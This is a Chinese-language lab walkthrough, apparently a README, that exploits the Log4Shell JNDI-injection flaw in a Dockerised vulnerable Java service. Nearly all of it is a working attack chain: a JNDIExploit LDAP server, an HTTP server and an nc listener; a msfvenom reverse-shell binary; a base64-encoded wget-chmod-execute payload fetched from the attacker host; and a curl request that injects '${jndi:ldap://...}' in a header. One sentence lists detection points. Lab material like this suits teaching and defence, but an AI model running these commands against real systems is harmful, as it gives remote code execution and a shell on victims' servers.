被攻击机 IP(本文示例中使用):47.47.47.47
攻击机 IP(本文示例中使用):48.48.48.48
- 被攻击机:使用 Dockerfile 构建镜像并运行(镜像名 vuln,映射 8080 端口):
docker build . -t vuln
docker run -p 8080:8080 --name vuln vuln
- 攻击机:使用 Dockerfile 构建镜像并运行(镜像名 attack):
docker build . -t attack
docker run -itd -p 9999:9999 -p 8888:8888 -p 1389:1389 -p 9000:9000 --name attack attack
攻击机环境准备
在三个不同的 shell 中分别执行以下三组命令,并保持这三个 shell 一直处于运行状态
- 攻击机启动 JNDI 服务器
docker exec -it attack /bin/bash
java -jar JNDIExploit-1.2-SNAPSHOT.jar -i 48.48.48.48 -p 8888
- 攻击机启动http服务器
docker exec -it attack /bin/bash
python3 -m http.server 9999
- 攻击机nc监听端口
docker exec -it attack /bin/bash
nc -lvvp 9000
攻击机实现攻击
以下命令均在同一个 shell 中执行
docker exec -it attack /bin/bash
- 攻击机准备反弹shell文件
msfvenom -p linux/x64/shell_reverse_tcp LHOST=48.48.48.48 LPORT=9000 -f elf -o /rev.elf
- 攻击机准备payload
echo 'wget http://48.48.48.48:9999/rev.elf -O /tmp/rev.elf && chmod +x /tmp/rev.elf && /tmp/rev.elf' | base64
# d2dldCBodHRwOi8vNDguNDguNDguNDg6OTk5OS9yZXYuZWxmIC1PIC90bXAvcmV2LmVsZiAmJiBjaG1vZCAreCAvdG1wL3Jldi5lbGYgJiYgL3RtcC9yZXYuZWxmCg==
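- 发送攻击 payload(请求头 X-Api-Version 中携带 ${jndi:ldap://...} 查找表达式;推测被攻击机在记录该请求头时会解析此表达式,并向 1389 端口的 LDAP 服务发起出站连接,因此请求日志中出现的 `${jndi:` 字符串以及应用服务器的异常出站连接是主要的检测点)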
curl 47.47.47.47:8080 -H 'X-Api-Version: ${jndi:ldap://48.48.48.48:1389/Basic/Command/Base64/d2dldCBodHRwOi8vNDguNDguNDguNDg6OTk5OS9yZXYuZWxmIC1PIC90bXAvcmV2LmVsZiAmJiBjaG1vZCAreCAvdG1wL3Jldi5lbGYgJiYgL3RtcC9yZXYuZWxmCg==}'
python3 command_gen.py vuln_ip attack_ip